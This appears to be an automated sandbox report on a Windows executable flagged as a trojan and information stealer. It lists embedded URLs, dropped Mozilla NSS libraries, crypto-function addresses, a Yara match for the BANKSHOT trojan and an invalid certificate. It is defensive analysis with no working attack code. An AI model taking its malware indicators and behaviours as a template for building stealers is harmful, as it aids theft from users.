Source: 9JtNIXVedn.exe	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
Source: 9JtNIXVedn.exe	String found in binary or memory: http://subca.ocsp-certum.com01
Source: 9JtNIXVedn.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: 9JtNIXVedn.exe	String found in binary or memory: http://subca.ocsp-certum.com05
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.com
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.com/
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.com/blog/how-to-activate-using-license-key/openU
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.com/help/
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.com/openU
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.comopenS
Source: 9JtNIXVedn.exe	String found in binary or memory: http://vovsoft.comopenU
Source: 9JtNIXVedn.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 9JtNIXVedn.exe	String found in binary or memory: http://www.indyproject.org/
Source: 9JtNIXVedn.exe, 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 9JtNIXVedn.exe, 00000000.00000002.1689407695.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 9JtNIXVedn.exe	String found in binary or memory: https://api.coingecko.com/api/v3/coins/
Source: 9JtNIXVedn.exe	String found in binary or memory: https://api.coingecko.com/api/v3/coins/list
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://support.mozilla.org
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: 9JtNIXVedn.exe	String found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
Source: 9JtNIXVedn.exe	String found in binary or memory: https://vovsoft.com/translation/
Source: 9JtNIXVedn.exe	String found in binary or memory: https://vovsoft.com/translation/openU
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: 9JtNIXVedn.exe	String found in binary or memory: https://www.certum.pl/CPS0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 9JtNIXVedn.exe, 00000000.00000003.1567525394.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJ.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 9JtNIXVedn.exe, 00000000.00000002.1677109407.0000000027DC2000.00000004.00000020.00020000.00000000.sdmp, HIIIDAKKJJJKKECAKKJE.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 9JtNIXVedn.exe, 00000000.00000003.1631643913.000000002DE6F000.00000004.00000020.00020000.00000000.sdmp, AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 9JtNIXVedn.exe, 00000000.00000003.1631643913.000000002DE6F000.00000004.00000020.00020000.00000000.sdmp, AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003173000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 9JtNIXVedn.exe, 00000000.00000003.1631643913.000000002DE6F000.00000004.00000020.00020000.00000000.sdmp, AAFIDGCFHIEHJJJJECAKKJDBAF.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.9JtNIXVedn.exe.3144ff7.0.raw.unpack, type: UNPACKEDPE

Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth

Detected potential crypto function

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDBECD0	0_2_6CDBECD0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD5ECC0	0_2_6CD5ECC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD6AC60	0_2_6CD6AC60
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3AC30	0_2_6CE3AC30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE26C00	0_2_6CE26C00
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEECDC0	0_2_6CEECDC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF6D90	0_2_6CDF6D90
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD64DB0	0_2_6CD64DB0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE2ED70	0_2_6CE2ED70
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE8AD50	0_2_6CE8AD50
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEE8D20	0_2_6CEE8D20
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD6AEC0	0_2_6CD6AEC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE00EC0	0_2_6CE00EC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDE6E90	0_2_6CDE6E90
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDFEE70	0_2_6CDFEE70
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE40E20	0_2_6CE40E20
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3EFF0	0_2_6CE3EFF0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD60FE0	0_2_6CD60FE0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA8FB0	0_2_6CEA8FB0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD6EFB0	0_2_6CD6EFB0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE22F70	0_2_6CE22F70
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDCEF40	0_2_6CDCEF40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD66F10	0_2_6CD66F10
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA0F20	0_2_6CEA0F20
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE668E0	0_2_6CE668E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE34840	0_2_6CE34840
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDB0820	0_2_6CDB0820
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDEA820	0_2_6CDEA820
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE7C9E0	0_2_6CE7C9E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD949F0	0_2_6CD949F0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE1A9A0	0_2_6CE1A9A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE209B0	0_2_6CE209B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF09A0	0_2_6CDF09A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD98960	0_2_6CD98960
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDB6900	0_2_6CDB6900
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDDEA80	0_2_6CDDEA80
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDDCA70	0_2_6CDDCA70
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE18A30	0_2_6CE18A30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE0EA00	0_2_6CE0EA00
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE66BE0	0_2_6CE66BE0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE00BA0	0_2_6CE00BA0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD68BAC	0_2_6CD68BAC
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDA64D0	0_2_6CDA64D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDFA4D0	0_2_6CDFA4D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE8A480	0_2_6CE8A480
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD78460	0_2_6CD78460
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDEA430	0_2_6CDEA430
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC4420	0_2_6CDC4420
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE2A5E0	0_2_6CE2A5E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDEE5F0	0_2_6CDEE5F0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD545B0	0_2_6CD545B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE00570	0_2_6CE00570
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDB8540	0_2_6CDB8540
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE64540	0_2_6CE64540
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA8550	0_2_6CEA8550
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC2560	0_2_6CDC2560
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD846D0	0_2_6CD846D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDBE6E0	0_2_6CDBE6E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDFE6E0	0_2_6CDFE6E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDBC650	0_2_6CDBC650
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD8A7D0	0_2_6CD8A7D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDE0700	0_2_6CDE0700
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD58090	0_2_6CD58090
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3C0B0	0_2_6CE3C0B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD700B0	0_2_6CD700B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDAE070	0_2_6CDAE070
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE2C000	0_2_6CE2C000
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE28010	0_2_6CE28010
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD601E0	0_2_6CD601E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEB61B0	0_2_6CEB61B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC8140	0_2_6CDC8140
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE44130	0_2_6CE44130
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDD6130	0_2_6CDD6130
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEE62C0	0_2_6CEE62C0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE322A0	0_2_6CE322A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE2E2B0	0_2_6CE2E2B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF8250	0_2_6CDF8250
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDE8260	0_2_6CDE8260
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE38220	0_2_6CE38220
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE2A210	0_2_6CE2A210
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDB43E0	0_2_6CDB43E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDBE3B0	0_2_6CDBE3B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD923A0	0_2_6CD923A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE7C360	0_2_6CE7C360
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD68340	0_2_6CD68340
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA2370	0_2_6CEA2370
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD62370	0_2_6CD62370
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF6370	0_2_6CDF6370
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDD2320	0_2_6CDD2320
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE21CE0	0_2_6CE21CE0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE9DCD0	0_2_6CE9DCD0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDFFC80	0_2_6CDFFC80
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD63C40	0_2_6CD63C40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE89C40	0_2_6CE89C40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD71C30	0_2_6CD71C30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE31DC0	0_2_6CE31DC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD53D80	0_2_6CD53D80
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEA9D90	0_2_6CEA9D90
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDC3D00	0_2_6CDC3D00
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD83EC0	0_2_6CD83EC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEE5E60	0_2_6CEE5E60
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEBBE70	0_2_6CEBBE70
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE6DE10	0_2_6CE6DE10
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE0BFF0	0_2_6CE0BFF0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE7DFC0	0_2_6CE7DFC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEE3FC0	0_2_6CEE3FC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD81F90	0_2_6CD81F90
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEB7F20	0_2_6CEB7F20
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD55F30	0_2_6CD55F30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CD95F20	0_2_6CD95F20
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3F8F0	0_2_6CE3F8F0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CEBB8F0	0_2_6CEBB8F0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CEEDAE0 appears 59 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CEED930 appears 48 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CE99F30 appears 31 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CD89B10 appears 73 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CEE09D0 appears 267 times
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: String function: 6CD83620 appears 74 times

PE / OLE file has an invalid certificate

Source: 9JtNIXVedn.exe

Static PE information: invalid certificate

PE file contains more sections than normal

Source: 9JtNIXVedn.exe

Static PE information: Number of sections : 11 > 10

Sample file is different than original file name gathered from version info

Source: 9JtNIXVedn.exe, 00000000.00000000.1373704928.0000000000B76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecryptotracker.exeP vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000000.1372749288.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000000.1372749288.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: \OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000002.1690872692.000000006CF35000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000002.1657076285.0000000002BF8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe, 00000000.00000002.1691379887.000000006FF32000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe	Binary or memory string: OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe	Binary or memory string: \OriginalFileName vs 9JtNIXVedn.exe
Source: 9JtNIXVedn.exe	Binary or memory string: OriginalFilenamecryptotracker.exeP vs 9JtNIXVedn.exe

Uses 32bit PE files

Source: 9JtNIXVedn.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 0.2.9JtNIXVedn.exe.3144ff7.0.raw.unpack, type: UNPACKEDPE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CDC0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6CDC0300

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\2REHJVOY.htm

Jump to behavior

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
